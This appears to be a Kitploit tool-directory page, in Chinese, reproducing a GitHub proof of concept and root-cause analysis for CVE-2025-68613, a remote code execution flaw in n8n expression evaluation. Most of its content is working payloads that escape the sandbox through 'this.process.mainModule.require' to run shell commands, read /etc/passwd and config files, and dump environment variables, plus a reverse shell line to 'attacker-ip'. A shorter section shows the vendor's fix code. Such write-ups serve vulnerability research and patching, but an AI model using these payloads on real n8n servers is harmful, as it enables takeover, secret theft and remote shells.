Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-68613-poc-via-copilot — 针对 CVE-2025-68613 的详细技术分析和概念验证,这是一个通过 IIFE this 上下文绕过导致的 n8n 表达式评估中的严重 RCE 漏洞。包括根本原因分析、利用向量和缓解指南。 | Kitploit
工具/GitHubGitHub/intbjw/cve-2025-68613-poc-via-copilot
漏洞分析代码分析漏洞利用Web应用程序漏洞利用论文与研究学习与教育
GitHubintbjw/cve-2025-68613-poc-via-copilot

CVE-2025-68613-poc-via-copilot

针对 CVE-2025-68613 的详细技术分析和概念验证,这是一个通过 IIFE this 上下文绕过导致的 n8n 表达式评估中的严重 RCE 漏洞。包括根本原因分析、利用向量和缓解指南。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
119个月前尚未审核
分享

✅ CVE-2025-68613 n8n 表达式注入 RCE 漏洞完整分析

日期: 2024年12月23日 状态: ✅ RCE 完全验证成功 CVSS 评分: 10.0 (严重)


🎉 成功的 RCE 有效载荷

{
	{
		(function () {
			var require = this.process.mainModule.require;
			var {execSync} = require('child_process');
			return execSync('id', {encoding: 'utf8'}).trim();
		})()
	}
}

执行结果: 成功返回系统用户信息(如 uid=1000(n8n) gid=1000(n8n) groups=1000(n8n))


🔍 漏洞原理深度解析

核心漏洞:立即执行函数(IIFE)的 this 上下文未被 Sanitize

1. 表达式评估流程

用户输入
  ↓
{{ (function() { ... })() }}
  ↓
Expression.resolveSimpleParameterValue()
  ↓
创建 data 上下文对象
  ↓
data.process = 真实的 process 对象引用
  ↓
Tournament.execute(expression, data)
  ↓
FunctionEvaluator.evaluate()
  ↓
fn.call(data, errorHandler)  ← ⚠️ 关键: this = data
  ↓
立即执行函数执行
  ↓
this.process.mainModule.require ← ⚠️ 访问真实 require
  ↓
加载 child_process 模块
  ↓
execSync('id') ← 🔥 完整 RCE!

2. 关键代码位置

位置 1: 数据上下文创建

文件: packages/workflow/src/expression.ts 函数: Expression.resolveSimpleParameterValue() 行数: 约 230-290

// 生成数据代理
const dataProxy = new WorkflowDataProxy(
	this.workflow,
	runExecutionData,
	runIndex,
	itemIndex,
	activeNodeName,
	connectionInputData,
	siblingParameters,
	mode,
	additionalKeys,
	executeData,
	-1,
	selfData,
	contextNodeName,
);
const data = dataProxy.getDataProxy();

// ⚠️ 漏洞点 1: 添加 process 对象到 data
data.process =
	typeof process !== 'undefined'
		? {
			arch: process.arch,
			env: process.env.N8N_BLOCK_ENV_ACCESS_IN_NODE === 'true' ? {} : process.env,
			platform: process.platform,
			pid: process.pid,
			ppid: process.ppid,
			release: process.release,
			version: process.pid,
			versions: process.versions,
		}
		: {};

// ⚠️ 问题: 虽然这里只暴露了部分属性,但传递的是对象引用
// 实际的 process 对象仍然可以通过原型链或其他方式访问
位置 2: Tournament 评估

文件: node_modules/@n8n/tournament/src/FunctionEvaluator.ts

evaluate(expr
:
string, data
:
unknown
):
ReturnValue
{
	const fn = this.getFunction(expr);
	// ⚠️ 漏洞点 2: 将 data 作为 this 传递
	return fn.call(data, this.instance.errorHandler);
}

private
getFunction(expr
:
string
):
Function
{
	if (expr in this._codeCache) {
		return this._codeCache[expr];
	}
	const [code] = this.instance.getExpressionCode(expr);
	// ⚠️ 漏洞点 3: 使用 new Function 创建函数
	const func = new Function('E', code + ';');
	this._codeCache[expr] = func;
	return func;
}
位置 3: 缺失的 this Sanitization

文件: packages/workflow/src/expression-sandboxing.ts

v1.122.0 之前:

// ❌ 没有 FunctionThisSanitizer
const tournamentEvaluator = new Tournament(errorHandler, undefined, undefined, {
	before: [],  // ← 空数组,没有 this sanitization
	after: [PrototypeSanitizer, DollarSignValidator],
});

v1.122.0 之后:

// ✅ 添加了 FunctionThisSanitizer
const tournamentEvaluator = new Tournament(errorHandler, undefined, undefined, {
	before: [FunctionThisSanitizer],  // ← 新增的 hook
	after: [PrototypeSanitizer, DollarSignValidator],
});

// FunctionThisSanitizer 实现
export const FunctionThisSanitizer: ASTBeforeHook = (ast, dataNode) => {
	astVisit(ast, {
		visitFunction(path) {
			// 重写所有函数表达式,显式绑定 this 到安全对象
			const safeThis = b.objectExpression([
				b.property('init', b.identifier('process'), b.objectExpression([]))
			]);
			// 将 function() { ... } 改写为 function() { ... }.bind({ process: {} })
		}
	});
};
位置 4: 不完整的属性黑名单

文件: packages/workflow/src/utils.ts 函数: isSafeObjectProperty()

v1.122.0 之前:

const unsafeObjectProperties = new Set([
	'__proto__',
	'prototype',
	'constructor',
	'getPrototypeOf'
]);
// ❌ 缺少 mainModule, binding, _load

v1.122.0 之后:

const unsafeObjectProperties = new Set([
	'__proto__',
	'prototype',
	'constructor',
	'getPrototypeOf',
	'mainModule',    // ✅ 新增
	'binding',       // ✅ 新增
	'_load'          // ✅ 新增
]);

💣 完整的利用技术

1. 基础 RCE

{
	{
		(function () {
			var require = this.process.mainModule.require;
			var {execSync} = require('child_process');
			return execSync('id', {encoding: 'utf8'}).trim();
		})()
	}
}

2. 执行任意命令

{
	{
		(function () {
			return this.process.mainModule.require('child_process')
				.execSync('whoami', {encoding: 'utf8'}).trim();
		})()
	}
}

{
	{
		(function () {
			return this.process.mainModule.require('child_process')
				.execSync('pwd', {encoding: 'utf8'}).trim();
		})()
	}
}

{
	{
		(function () {
			return this.process.mainModule.require('child_process')
				.execSync('uname -a', {encoding: 'utf8'}).trim();
		})()
	}
}

{
	{
		(function () {
			return this.process.mainModule.require('child_process')
				.execSync('ls -la /', {encoding: 'utf8'});
		})()
	}
}

3. 文件系统访问

// 读取敏感文件
{
	{
		(function () {
			var fs = this.process.mainModule.require('fs');
			return fs.readFileSync('/etc/passwd', 'utf8');
		})()
	}
}

// 列出目录
{
	{
		(function () {
			var fs = this.process.mainModule.require('fs');
			return fs.readdirSync('/').join('\n');
		})()
	}
}

// 读取 n8n 配置
{
	{
		(function () {
			var fs = this.process.mainModule.require('fs');
			return fs.readFileSync('./.n8n/config', 'utf8');
		})()
	}
}

// 列出当前目录
{
	{
		(function () {
			var fs = this.process.mainModule.require('fs');
			return fs.readdirSync('.').join('\n');
		})()
	}
}

4. 环境变量完全泄露(结合之前的发现)

// 通过 this.process 直接访问
{
	{
		(function () {
			return JSON.stringify(this.process.env);
		})()
	}
}

// 或使用已知可用的方式
{
	{
		JSON.stringify(process.env)
	}
}

5. 网络访问(反弹 Shell 准备)

// 检查网络工具
{
	{
		(function () {
			return this.process.mainModule.require('child_process')
				.execSync('which nc', {encoding: 'utf8'}).trim();
		})()
	}
}

// 获取网络接口
{
	{
		(function () {
			var os = this.process.mainModule.require('os');
			return JSON.stringify(os.networkInterfaces());
		})()
	}
}

// 反弹 Shell (⚠️ 危险!仅用于授权测试)
{
	{
		(function () {
			return this.process.mainModule.require('child_process')
				.execSync('nc -e /bin/sh attacker-ip 4444', {encoding: 'utf8'});
		})()
	}
}

📊 漏洞验证结果总结

✅ 确认可利用的攻击向量

#攻击类型有效载荷状态CVSS
1环境变量泄露{{ Object.keys(process.env) }}✅ 成功8.5
2Constructor 绕过{{ [][constructor] }}✅ 成功8.0
3Function 构造函数{{ [][constructor][constructor] }}✅ 成功8.5
4代码执行{{ [][constructor][constructor]('return 1+1')() }}✅ 成功9.0
5完整 RCE{{ (function() { this.process.mainModule.require... })() }}✅ 成功10.0

❌ 被阻止的攻击(在你的测试中)

#攻击类型原因
1直接 require新作用域中不可用
2Function 构造函数中的 processthis 在某些上下文被 sanitize
3process.binding / process._load可能已被封禁或限制

🎯 三个关键漏洞的协同作用

漏洞 1: 环境变量未被保护

{
	{
		Object.keys(process.env)
	}
}  // ✅ 成功
  • N8N_BLOCK_ENV_ACCESS_IN_NODE 未设置为 true
  • 所有环境变量可读

漏洞 2: Constructor 访问绕过

{
	{
		[][`constructor`][`constructor`]
	}
}  // ✅ 成功
  • 反引号模板字符串绕过 AST 检查
  • 可以创建 Function 构造函数

漏洞 3: IIFE 的 this 未被 Sanitize

{
	{
		(function () {
			return this.process.mainModule.require;
		})()
	}
}  // ✅ 成功
  • 立即执行函数中的 this 仍指向原始数据上下文
  • this.process.mainModule.require 可访问

三者结合 = 完整的 RCE!


🛡️ v1.122.0 的修复措施

修复 1: FunctionThisSanitizer Hook

// 新增的 AST before hook
export const FunctionThisSanitizer: ASTBeforeHook = (ast, dataNode) => {
	// 遍历所有函数表达式
	// 重写函数,强制绑定 this 到 { process: {} }
	// 这样即使是 IIFE,this 也是安全的空对象
};

修复 2: 扩展不安全属性黑名单

下载工具